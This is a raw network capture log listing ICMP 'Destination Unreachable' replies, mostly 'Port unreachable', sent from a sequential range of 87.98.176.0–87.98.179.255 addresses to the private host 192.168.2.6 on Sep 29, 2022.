Sep 29, 2022 14:50:25.689836979 CEST	87.98.177.185	192.168.2.6	c8f9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.690056086 CEST	87.98.177.146	192.168.2.6	c8d2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.691914082 CEST	87.98.177.155	192.168.2.6	c8d4	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:25.691951036 CEST	87.98.177.153	192.168.2.6	c8d9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.692157984 CEST	87.98.177.159	192.168.2.6	c8df	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.692184925 CEST	87.98.177.157	192.168.2.6	c8dd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.694037914 CEST	87.98.177.166	192.168.2.6	c8dc	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:25.694112062 CEST	87.98.177.167	192.168.2.6	c8e7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.695383072 CEST	87.98.177.169	192.168.2.6	c8e9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.695420980 CEST	87.98.177.174	192.168.2.6	c8ee	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.700578928 CEST	87.98.177.193	192.168.2.6	c901	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.706269026 CEST	87.98.177.202	192.168.2.6	c90a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.709055901 CEST	87.98.177.214	192.168.2.6	c916	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.712734938 CEST	87.98.177.198	192.168.2.6	c906	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.713637114 CEST	87.98.177.203	192.168.2.6	c90b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.714068890 CEST	87.98.177.204	192.168.2.6	c90c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.714637995 CEST	87.98.177.206	192.168.2.6	c90e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.714922905 CEST	87.98.177.207	192.168.2.6	c90f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.715616941 CEST	87.98.177.210	192.168.2.6	c912	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.715979099 CEST	87.98.177.211	192.168.2.6	c913	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.717015028 CEST	87.98.177.219	192.168.2.6	c91b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.717128992 CEST	87.98.177.218	192.168.2.6	c91a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.717165947 CEST	87.98.177.220	192.168.2.6	c91c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.717187881 CEST	87.98.177.215	192.168.2.6	c917	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.717875957 CEST	87.98.177.212	192.168.2.6	c914	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.724421024 CEST	87.98.177.253	192.168.2.6	c93d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.726298094 CEST	87.98.177.230	192.168.2.6	c926	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.728730917 CEST	87.98.177.239	192.168.2.6	c92f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.729384899 CEST	87.98.177.244	192.168.2.6	c934	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.729702950 CEST	87.98.177.243	192.168.2.6	c933	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.731797934 CEST	87.98.177.250	192.168.2.6	c93a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:25.735097885 CEST	87.98.177.233	192.168.2.6	c91f	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.747422934 CEST	87.98.177.255	192.168.2.6	c93f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.747700930 CEST	87.98.178.12	192.168.2.6	c94c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.748228073 CEST	87.98.178.0	192.168.2.6	c940	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.749572039 CEST	87.98.178.9	192.168.2.6	c949	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.756340981 CEST	87.98.178.13	192.168.2.6	c94d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.756810904 CEST	87.98.178.27	192.168.2.6	c95b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.762311935 CEST	87.98.178.19	192.168.2.6	c953	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.762346029 CEST	87.98.178.25	192.168.2.6	c959	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.762366056 CEST	87.98.178.22	192.168.2.6	c956	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.762383938 CEST	87.98.178.21	192.168.2.6	c94e	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.763866901 CEST	87.98.178.29	192.168.2.6	c95d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.764271975 CEST	87.98.178.26	192.168.2.6	c95a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.813272953 CEST	87.98.178.52	192.168.2.6	c974	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.813328981 CEST	87.98.178.54	192.168.2.6	c976	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.818960905 CEST	87.98.178.33	192.168.2.6	c961	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.819343090 CEST	87.98.178.36	192.168.2.6	c964	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.819375038 CEST	87.98.178.39	192.168.2.6	c967	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.819403887 CEST	87.98.178.37	192.168.2.6	c965	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.820209026 CEST	87.98.178.35	192.168.2.6	c963	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.820455074 CEST	87.98.178.38	192.168.2.6	c966	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.820636988 CEST	87.98.178.44	192.168.2.6	c96c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.821177959 CEST	87.98.178.58	192.168.2.6	c97a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.821464062 CEST	87.98.178.55	192.168.2.6	c977	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.821881056 CEST	87.98.178.59	192.168.2.6	c97b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.823395014 CEST	87.98.178.62	192.168.2.6	c97e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.823570013 CEST	87.98.178.60	192.168.2.6	c97c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.824055910 CEST	87.98.178.61	192.168.2.6	c97d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.825217009 CEST	87.98.178.74	192.168.2.6	c98a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.825978994 CEST	87.98.178.69	192.168.2.6	c97b	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.826014042 CEST	87.98.178.71	192.168.2.6	c987	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.826109886 CEST	87.98.178.120	192.168.2.6	c9b8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.826673031 CEST	87.98.178.81	192.168.2.6	c991	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.826843023 CEST	87.98.178.79	192.168.2.6	c98f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.827222109 CEST	87.98.178.76	192.168.2.6	c985	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.827255011 CEST	87.98.178.90	192.168.2.6	c99a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.827466011 CEST	87.98.178.89	192.168.2.6	c999	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.829639912 CEST	87.98.178.145	192.168.2.6	c9d1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.830174923 CEST	87.98.178.95	192.168.2.6	c99f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.830476046 CEST	87.98.178.97	192.168.2.6	c9a1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.831429005 CEST	87.98.178.99	192.168.2.6	c9a3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.831506968 CEST	87.98.178.106	192.168.2.6	c9aa	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.833935022 CEST	87.98.178.121	192.168.2.6	c9b9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.834594965 CEST	87.98.178.122	192.168.2.6	c9ba	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.834994078 CEST	87.98.178.125	192.168.2.6	c9bd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.835582972 CEST	87.98.178.130	192.168.2.6	c9c2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.836159945 CEST	87.98.178.131	192.168.2.6	c9c3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.837029934 CEST	87.98.178.146	192.168.2.6	c9d2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.838131905 CEST	87.98.178.152	192.168.2.6	c9d8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.838645935 CEST	87.98.178.148	192.168.2.6	c9d4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.839880943 CEST	87.98.178.159	192.168.2.6	c9df	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.841428041 CEST	87.98.178.167	192.168.2.6	c9e7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.849280119 CEST	87.98.178.181	192.168.2.6	c9f5	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.849446058 CEST	87.98.178.176	192.168.2.6	c9f0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.849816084 CEST	87.98.178.186	192.168.2.6	c9fa	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.849896908 CEST	87.98.178.190	192.168.2.6	c9fe	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.850055933 CEST	87.98.178.193	192.168.2.6	ca01	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.855379105 CEST	87.98.178.172	192.168.2.6	c9ec	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.856412888 CEST	87.98.178.178	192.168.2.6	c9f2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.856650114 CEST	87.98.178.173	192.168.2.6	c9ed	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.856921911 CEST	87.98.178.189	192.168.2.6	c9fd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.857237101 CEST	87.98.178.188	192.168.2.6	c9fc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.857585907 CEST	87.98.178.183	192.168.2.6	c9f7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.857619047 CEST	87.98.178.184	192.168.2.6	c9f8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.858329058 CEST	87.98.178.194	192.168.2.6	ca02	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.858592033 CEST	87.98.178.195	192.168.2.6	ca03	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.858778954 CEST	87.98.178.197	192.168.2.6	ca05	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.859191895 CEST	87.98.178.199	192.168.2.6	ca07	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.861408949 CEST	87.98.178.207	192.168.2.6	ca0f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.861452103 CEST	87.98.178.208	192.168.2.6	ca10	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.861474037 CEST	87.98.178.241	192.168.2.6	ca31	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.861711979 CEST	87.98.178.205	192.168.2.6	ca0d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.862296104 CEST	87.98.178.213	192.168.2.6	ca0e	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.863009930 CEST	87.98.178.212	192.168.2.6	ca0d	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.863447905 CEST	87.98.178.214	192.168.2.6	ca16	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.863850117 CEST	87.98.178.206	192.168.2.6	ca0e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.864260912 CEST	87.98.178.225	192.168.2.6	ca21	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.867032051 CEST	87.98.178.234	192.168.2.6	ca2a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.867685080 CEST	87.98.178.236	192.168.2.6	ca2c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.867841959 CEST	87.98.178.237	192.168.2.6	ca2d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.868750095 CEST	87.98.178.240	192.168.2.6	ca30	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.869735956 CEST	87.98.178.249	192.168.2.6	ca39	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.869775057 CEST	87.98.178.247	192.168.2.6	ca30	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.869832039 CEST	87.98.178.246	192.168.2.6	ca36	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:26.870635033 CEST	87.98.178.251	192.168.2.6	ca31	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:26.872247934 CEST	87.98.178.254	192.168.2.6	ca3e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.898780107 CEST	87.98.179.3	192.168.2.6	ca43	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.906229973 CEST	87.98.179.4	192.168.2.6	ca44	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.906281948 CEST	87.98.178.255	192.168.2.6	ca3f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.906893969 CEST	87.98.179.0	192.168.2.6	ca40	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.909132957 CEST	87.98.179.5	192.168.2.6	ca45	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.909934998 CEST	87.98.179.8	192.168.2.6	ca48	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.917414904 CEST	87.98.179.13	192.168.2.6	ca4d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.927532911 CEST	87.98.179.14	192.168.2.6	ca4e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.927581072 CEST	87.98.179.20	192.168.2.6	ca54	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.927615881 CEST	87.98.179.24	192.168.2.6	ca58	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.930082083 CEST	87.98.179.31	192.168.2.6	ca5f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.930115938 CEST	87.98.179.29	192.168.2.6	ca5d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.930206060 CEST	87.98.179.30	192.168.2.6	ca5e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.930912018 CEST	87.98.179.37	192.168.2.6	ca65	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.931113958 CEST	87.98.179.34	192.168.2.6	ca62	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.931359053 CEST	87.98.179.45	192.168.2.6	ca6d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.931448936 CEST	87.98.179.44	192.168.2.6	ca6c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.931935072 CEST	87.98.179.41	192.168.2.6	ca69	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.932770967 CEST	87.98.179.53	192.168.2.6	ca75	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.933013916 CEST	87.98.179.51	192.168.2.6	ca73	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.933140993 CEST	87.98.179.56	192.168.2.6	ca78	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.933660984 CEST	87.98.179.50	192.168.2.6	ca72	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.933684111 CEST	87.98.179.58	192.168.2.6	ca73	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:27.933764935 CEST	87.98.179.54	192.168.2.6	ca76	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.934139013 CEST	87.98.179.60	192.168.2.6	ca75	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:27.941443920 CEST	87.98.179.82	192.168.2.6	ca8b	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:27.945266962 CEST	87.98.179.106	192.168.2.6	caaa	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.945445061 CEST	87.98.179.66	192.168.2.6	ca82	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.945952892 CEST	87.98.179.70	192.168.2.6	ca86	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.946075916 CEST	87.98.179.69	192.168.2.6	ca85	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.947901964 CEST	87.98.179.78	192.168.2.6	ca8e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.948648930 CEST	87.98.179.76	192.168.2.6	ca8c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.949404001 CEST	87.98.179.80	192.168.2.6	ca90	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.950901985 CEST	87.98.179.93	192.168.2.6	ca9d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.950989008 CEST	87.98.179.96	192.168.2.6	caa0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.951540947 CEST	87.98.179.99	192.168.2.6	caa3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.952107906 CEST	87.98.179.105	192.168.2.6	caa9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.953957081 CEST	87.98.179.107	192.168.2.6	caab	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.953988075 CEST	87.98.179.109	192.168.2.6	caa6	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:27.954008102 CEST	87.98.179.104	192.168.2.6	caa8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.954026937 CEST	87.98.179.119	192.168.2.6	cab7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.954050064 CEST	87.98.179.112	192.168.2.6	cab0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.954070091 CEST	87.98.179.113	192.168.2.6	cab1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.954092026 CEST	87.98.179.118	192.168.2.6	cab6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.954818010 CEST	87.98.179.115	192.168.2.6	cab3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.959498882 CEST	87.98.179.125	192.168.2.6	cabd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.959647894 CEST	87.98.179.123	192.168.2.6	cab4	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:27.963228941 CEST	87.98.179.135	192.168.2.6	cac7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.963520050 CEST	87.98.179.137	192.168.2.6	cac9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:27.963555098 CEST	87.98.179.136	192.168.2.6	cac8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.012641907 CEST	87.98.179.153	192.168.2.6	cad9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.018584967 CEST	87.98.179.142	192.168.2.6	cace	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.019541025 CEST	87.98.179.149	192.168.2.6	cad5	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.020435095 CEST	87.98.179.159	192.168.2.6	cad8	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:28.020479918 CEST	87.98.179.155	192.168.2.6	cad1	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:28.020720959 CEST	87.98.179.162	192.168.2.6	cae2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.020740032 CEST	87.98.179.166	192.168.2.6	cae6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.021979094 CEST	87.98.179.164	192.168.2.6	cae4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.022335052 CEST	87.98.179.160	192.168.2.6	cae0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.022521019 CEST	87.98.179.171	192.168.2.6	caeb	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.022593021 CEST	87.98.179.173	192.168.2.6	caed	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.024058104 CEST	87.98.179.188	192.168.2.6	cafc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.024480104 CEST	87.98.179.187	192.168.2.6	cafb	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.025006056 CEST	87.98.179.189	192.168.2.6	cafd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.025965929 CEST	87.98.179.196	192.168.2.6	cb04	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.026321888 CEST	87.98.179.201	192.168.2.6	cb09	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.026387930 CEST	87.98.179.199	192.168.2.6	cb07	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.026957035 CEST	87.98.179.206	192.168.2.6	cb0e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.027107954 CEST	87.98.179.210	192.168.2.6	cb12	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.027720928 CEST	87.98.179.214	192.168.2.6	cb16	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028101921 CEST	87.98.179.218	192.168.2.6	cb1a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028122902 CEST	87.98.179.216	192.168.2.6	cb18	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028141975 CEST	87.98.179.213	192.168.2.6	cb15	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028398991 CEST	87.98.179.222	192.168.2.6	cb1e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028517008 CEST	87.98.179.223	192.168.2.6	cb1f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028541088 CEST	87.98.179.221	192.168.2.6	cb1d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.028563976 CEST	87.98.179.220	192.168.2.6	cb1c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.029433966 CEST	87.98.179.229	192.168.2.6	cb1e	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:28.030123949 CEST	87.98.179.232	192.168.2.6	cb28	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.031131029 CEST	87.98.179.240	192.168.2.6	cb30	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.032267094 CEST	87.98.179.242	192.168.2.6	cb32	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.033287048 CEST	87.98.179.246	192.168.2.6	cb36	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.033451080 CEST	87.98.179.245	192.168.2.6	cb35	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.034260988 CEST	87.98.179.251	192.168.2.6	cb3b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:28.034996033 CEST	87.98.179.230	192.168.2.6	cb26	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:29.078186989 CEST	87.98.179.255	192.168.2.6	cb3f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.484987020 CEST	87.98.176.1	192.168.2.6	c736	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.486474037 CEST	87.98.176.9	192.168.2.6	c73e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.486653090 CEST	87.98.176.14	192.168.2.6	c73c	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.486671925 CEST	87.98.176.15	192.168.2.6	c744	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.486686945 CEST	87.98.176.8	192.168.2.6	c73d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.486804962 CEST	87.98.176.10	192.168.2.6	c73f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.486821890 CEST	87.98.176.7	192.168.2.6	c73c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.487034082 CEST	87.98.176.16	192.168.2.6	c745	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.487179995 CEST	87.98.176.11	192.168.2.6	c740	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.487287998 CEST	87.98.176.17	192.168.2.6	c746	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.487844944 CEST	87.98.176.25	192.168.2.6	c74e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.487860918 CEST	87.98.176.27	192.168.2.6	c750	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.488193989 CEST	87.98.176.24	192.168.2.6	c74d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.501060009 CEST	87.98.176.34	192.168.2.6	c750	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.501765013 CEST	87.98.176.39	192.168.2.6	c75c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.505836010 CEST	87.98.176.90	192.168.2.6	c78f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.508115053 CEST	87.98.176.33	192.168.2.6	c756	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.508272886 CEST	87.98.176.35	192.168.2.6	c758	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.508815050 CEST	87.98.176.38	192.168.2.6	c75b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.509816885 CEST	87.98.176.42	192.168.2.6	c75f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.509917021 CEST	87.98.176.53	192.168.2.6	c76a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.510077953 CEST	87.98.176.55	192.168.2.6	c76c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.510672092 CEST	87.98.176.58	192.168.2.6	c76f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.512392044 CEST	87.98.176.74	192.168.2.6	c77f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.512727022 CEST	87.98.176.82	192.168.2.6	c787	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.513462067 CEST	87.98.176.83	192.168.2.6	c788	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.514162064 CEST	87.98.176.92	192.168.2.6	c78a	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.514184952 CEST	87.98.176.99	192.168.2.6	c798	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.514264107 CEST	87.98.176.85	192.168.2.6	c78a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.514911890 CEST	87.98.176.102	192.168.2.6	c794	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.515815973 CEST	87.98.176.113	192.168.2.6	c7a6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.516321898 CEST	87.98.176.110	192.168.2.6	c7a3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.522742987 CEST	87.98.176.116	192.168.2.6	c7a9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.522998095 CEST	87.98.176.114	192.168.2.6	c7a7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.523483038 CEST	87.98.176.122	192.168.2.6	c7af	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.523701906 CEST	87.98.176.117	192.168.2.6	c7a3	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.524328947 CEST	87.98.176.130	192.168.2.6	c7b7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.524413109 CEST	87.98.176.124	192.168.2.6	c7b1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.526151896 CEST	87.98.176.142	192.168.2.6	c7c3	(Port unreachable)	Destination Unreachable
